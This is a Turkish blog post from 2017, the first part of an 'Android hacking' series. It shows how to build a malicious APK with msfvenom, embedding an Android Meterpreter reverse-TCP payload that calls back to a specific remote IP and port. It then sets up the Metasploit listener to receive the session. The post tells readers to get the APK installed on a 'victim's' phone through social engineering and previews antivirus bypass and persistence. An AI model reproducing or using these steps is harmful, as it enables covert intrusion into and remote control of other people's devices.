2 Mayıs 2017 Salı

Android Hacking Serisi - 1

   Mayıs 02, 2017  Yorum yok  Edit

Bu makalemizi yazarken kullandığımız telefon Android 4.4.2 KitKat işletim sistemine sahiptir.
Kullandığımız uzak sunucu DigitalOcean'dan alınmış, tüm portları açık olmakla birlikte dağıtım olarak Parrot Cloud OS tercih ettik.

Özelliklerimizi belirttiğimize göre Android Hacking sersinin ilk makalesini yazmaya başlayabiliriz.
Bunun için çeşitli araçlar kullanılabilir fakat biz ilk adım olarak msfvenom üzerinden başlayalım.

msfvenom -p android/meterpreter/reverse_tcp LHOST=139.59.131.130 LPORT=4444 R >/root/FILENAME.apk

  • -p  Payload belirleme
  • LHOST  Makinemizin IP adresi veya DDNS
  • LPORT  Dinlemek istediğiniz portu belirleme
  • R  Raw formatı belirleme
  • /root/FILENAME.apk  Oluşturulan zararlı uygulamanın kaydedileceği yolu belirleme


Aşağıda gördüğünüz gibi apk dosyamız oluştu.


Oluşturulan bu apk'yı bir şekilde karşı tarafa yükletmek bizim "Sosyal Mühendislik" becerilerinize kalmıştır. İlerleyen serilerimizde sosyal mühendislik taktiklerinden de bahsediyor olacağız.

Şimdi ise msfconsole yazarak Metasploit Framework'ü başlatıyoruz


use exploit/multi/handler komutu ile multi/handler modülünü aktif ediyoruz.


set payload android/meterpreter/reverse_tcp komutu ile payloadımızı belirtiyoruz.


show options diyerek girmemizi istediği alanları görelim.


set LHOST parametresi ile uzak sunucumuzun IP adresini belirtiyoruz.
Portumuzu oluştururken 4444 olarak belirlemiştik. LPORT parametresinde farklı bir port belirttiyseniz set LPORT diyerek önceden belirtmiş olduğunuz portu payloadınıza ekleyebilirsiniz.


exploit diyerek dinlemeyi aktif hale getirelim...


Şu anda belirtmiş olduğumuz IP ve PORT üzerinden dinliyor ve kurban apk programını çalıştırdığında Meterpreter Session'a düşecektir, böylece biz de onun Android sistemine sızmış olacağız.


Evet, görüldüğü üzere Meterpreter Session'ı başarıyla aldık. 


sysinfo komutu ile systeme ait bazi bilgileri listeledik.

İlerleyen makalelerimiz de bu Session üzerinden neler yapılabilir , Antivirüs programları nasıl bypass edilir, kalıcı hale nasıl getirebiliriz gibi konulara değineceğiz.

0 yorum:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)